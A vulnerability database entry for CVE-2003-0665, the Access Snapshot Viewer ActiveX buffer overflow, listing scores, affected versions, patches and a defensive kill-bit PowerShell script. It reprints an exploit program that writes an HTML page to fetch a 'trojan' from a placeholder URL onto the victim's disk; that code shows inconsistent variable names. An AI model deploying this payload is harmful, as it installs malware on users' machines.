CVE-2003-0665
CVSS 7.5
Published: 2003-10-20 00:00:00
Revised: 2012-09-12 21:20:49

[Original] Buffer overflow in the ActiveX control for Microsoft Access Snapshot Viewer for Access 97, 2000, and 2002 allows remote attackers to execute arbitrary code via long parameters to the control.


[CNNVD] Microsoft Access Snapshot Viewer Remote Buffer Overflow Vulnerability (MS03-038) (CNNVD-200310-046)

Microsoft Access Snapshot Viewer implements the report snapshot feature of Office 2000. It allows report content to be viewed without Access installed; for example, a business can use Access to send invoices to its customers. Snapshot Viewer ships with every version of Access but is not installed by default. Snapshot Viewer is implemented as an ActiveX control.
Because Snapshot Viewer fails to validate some of its parameters correctly, a remote attacker can exploit this vulnerability by building a malicious page and luring a user into visiting it, which triggers a buffer overflow.
Since some parameters in the file lack sufficient buffer boundary checks, an attacker can lure a user into visiting a web page containing malicious data; the overflow occurs when Snapshot Viewer parses it, and carefully crafted page data may execute arbitrary instructions on the system with the privileges of the user's process.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:microsoft:access:2002:sp1    Microsoft Access 2002 sp1
cpe:/a:microsoft:access:2000:sp3    Microsoft Access 2000 sp3
cpe:/a:microsoft:access:2000        Microsoft Access 2000
cpe:/a:microsoft:access:2002        Microsoft Access 2002
cpe:/a:microsoft:access:2002:sp2    Microsoft Access 2002 sp2
cpe:/a:microsoft:access:97          Microsoft Access 97
cpe:/a:microsoft:access:2000:sp2    Microsoft Access 2000 sp2
cpe:/a:microsoft:access:2000:sp1    Microsoft Access 2000_sr1

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0665
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0665
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-046
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/992132
(UNKNOWN)  CERT-VN  VU#992132
http://www.microsoft.com/technet/security/bulletin/ms03-038.asp
(VENDOR_ADVISORY)  MS  MS03-038
http://www.securityfocus.com/bid/8536
(UNKNOWN)  BID  8536
http://secunia.com/advisories/9668
(UNKNOWN)  SECUNIA  9668

- Vulnerability information

Microsoft Access Snapshot Viewer Remote Buffer Overflow Vulnerability (MS03-038)
High    Boundary Condition Error
2003-10-20 00:00:00    2005-10-20 00:00:00
Remote

- Advisories and patches

Vendor patches:
Microsoft
---------
Microsoft has released a security bulletin (MS03-038) and the corresponding patch:
MS03-038: Unchecked buffer in Microsoft Access Snapshot Viewer Could Allow Code Execution (827104)
Link:
http://www.microsoft.com/technet/security/bulletin/MS03-038.asp

Patch download:
Access 2002:
http://microsoft.com/downloads/details.aspx?FamilyId=B50D4863-1BBE-4009-9DF8-52D3A916D54F&displaylang=en
http://microsoft.com/office/ork/xp/journ/snpv1001a.htm (administrative update only)
Access 2000:
http://microsoft.com/downloads/details.aspx?FamilyId=F6CB9C8E-16E3-422D-86DD-7ED5671FB8D4&displaylang=en
http://microsoft.com/office/ork/2000/journ/snpv0901.htm (administrative update only)
Access 97:
Install the updated stand-alone Snapshot Viewer control, available from:
http://www.microsoft.com/AccessDev/Articles/snapshot.htm

Stand-alone Snapshot Viewer Control:
http://www.microsoft.com/AccessDev/Articles/snapshot.htm

- Vulnerability information (23095)

Microsoft Access 97/2000/2002 Snapshot Viewer ActiveX Control Parameter Buffer Overflow Vulnerability (EDBID:23095)
Platform: windows    Type: remote
Date: 2003-09-03    Verified
Port: 0    Author: Oliver Lavery
Vulnerable app: N/A
source: http://www.securityfocus.com/bid/8536/info

Microsoft Access Snapshot Viewer is prone to a remote buffer-overflow condition because the software fails to perform sufficient boundary checks on user-supplied parameters. Presumably, a remote attacker may be able to leverage this issue to execute arbitrary code in the context of the user running the affected Internet Explorer. 

/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
   Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0
   Download nice binaries into an arbitrary box
   Vulnerability discovered by Oliver Lavery
   http://www.securityfocus.com/bid/8536/info
   Remote: Yes
   greetz to str0ke */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memcpy */

#define Filename        "Ms-Access-SnapShot.html"

/* HTML page written to Filename; instantiates the Snapshot Viewer control by CLSID */
char data[] =
"<html>\n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attaque'></object>\n"
              "<script language='javascript'>\nvar arbitrary_file = 'http://path_to_trojan'\n"
              "var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = arbitrary_file\n"
              "attack.CompressedPath = destination\nattack.PrintSnapshot(arbitrary_file,destination)\n"
              "<script>\n<html>";

int main ()
{
        printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**\n");
        printf("**c0ded by callAX**\n");
        printf("**r00t your enemy .| **");

        FILE *File;
        char *b0fer;

        if ( (File = fopen(Filename,"w+b")) == NULL ) {
                printf("\n fopen() error");
                exit(1);
        }

        /* copy the page body (without the terminating NUL) into a heap buffer and write it out */
        b0fer = (char*)malloc(strlen(data));
        memcpy(b0fer,data,sizeof(data)-1);

        fwrite(b0fer, strlen(data), 1,File);
        fclose(File);
        free(b0fer);

        printf("\n\n" Filename " has been created.\n");
        return 0;
}

- Vulnerability information

10998
Microsoft Access Snapshot Viewer ActiveX Control Arbitrary Command Execution
Remote / Network Access, Context Dependent Input Manipulation

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-09-03 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Microsoft Access Snapshot Viewer ActiveX Control Parameter Buffer Overflow Vulnerability
Boundary Condition Error    BID 8536
Remote: Yes    Local: No
2003-09-03 12:00:00    2008-07-24 11:18:00
Discovery of this vulnerability has been credited to Oliver Lavery.

- Affected program versions

Microsoft Access 97
+ Microsoft Office 97
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
Microsoft Access 2002 SP2
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
Microsoft Access 2002 SP1
Microsoft Access 2002
+ Microsoft Office XP
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Access 2000 SR1
Microsoft Access 2000 SP3
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
Microsoft Access 2000 SP2
Microsoft Access 2000
+ Microsoft Office 2000
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0

- Vulnerability discussion

Microsoft Access Snapshot Viewer is prone to a remote buffer-overflow condition because the software fails to perform sufficient boundary checks on user-supplied parameters. Presumably, a remote attacker may be able to leverage this issue to execute arbitrary code in the context of the user running the affected Internet Explorer.

- Exploit

The following exploit code is available:

- Solution

Microsoft has released fixes. This fix does not set the kill bit on the affected ActiveX control. The vendor has reported that a kill bit will be issued for the old affected control in a forthcoming Internet Explorer security patch. The vendor advises customers who are running Access 97 and the standalone Snapshot Viewer to install the updated standalone Snapshot Viewer. See the references for details.


Microsoft Access 97

Microsoft Access 2000 SP3

Microsoft Access 2002 SP2
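Because the fix above does not set the kill bit, an administrator will want to verify that state directly. The following PowerShell script is an added example (not from the advisory, SecurityFocus, or Microsoft): it reports whether the Snapshot Viewer control is registered on the machine and whether Internet Explorer's kill bit is present for its CLSID, and with -SetMissing writes the bit. The CLSID is the one instantiated by the exploit page above; the "ActiveX Compatibility" key and the 0x400 "Compatibility Flags" value are IE's documented kill-bit mechanism.

```powershell
# Added example (not from the advisory or Microsoft): audit and optionally set the
# Internet Explorer kill bit for the Access Snapshot Viewer control. Run elevated to write.
param([switch]$SetMissing)

# CLSID used by the exploit page above; 0x400 is IE's documented kill-bit flag.
$Clsid   = '{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}'
$KillBit = 0x400
$CompatKeys = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
)

function Get-ControlServer {
    # Returns the registered in-process server (e.g. snapview.ocx) or $null if not registered.
    $key = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid\InprocServer32"
    if (Test-Path $key) { return (Get-ItemProperty -Path $key).'(default)' }
    return $null
}

function Test-KillBit {
    param([string]$Key)
    if (-not (Test-Path $Key)) { return $false }
    $flags = (Get-ItemProperty -Path $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return $false }
    return (($flags -band $KillBit) -ne 0)
}

function Set-KillBit {
    param([string]$Key)
    if (-not (Test-Path $Key)) { New-Item -Path $Key -Force | Out-Null }
    $flags = (Get-ItemProperty -Path $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    $flags = [int]$flags -bor $KillBit   # keep any other compatibility flags already set
    New-ItemProperty -Path $Key -Name 'Compatibility Flags' -PropertyType DWord -Value $flags -Force | Out-Null
}

$server = Get-ControlServer
if ($server) { Write-Output "Control registered: $server" }
else         { Write-Output "Control not registered (kill bit still worthwhile as defense in depth)" }

foreach ($key in $CompatKeys) {
    if (Test-KillBit $key) {
        Write-Output "Kill bit set:     $key"
    } elseif ($SetMissing) {
        Set-KillBit $key
        Write-Output "Kill bit written: $key"
    } else {
        Write-Output "Kill bit MISSING: $key"
    }
}
```

Set the bit for the old control only after the updated control has been deployed, since the kill bit blocks every version registered under that CLSID.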

- Related references

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.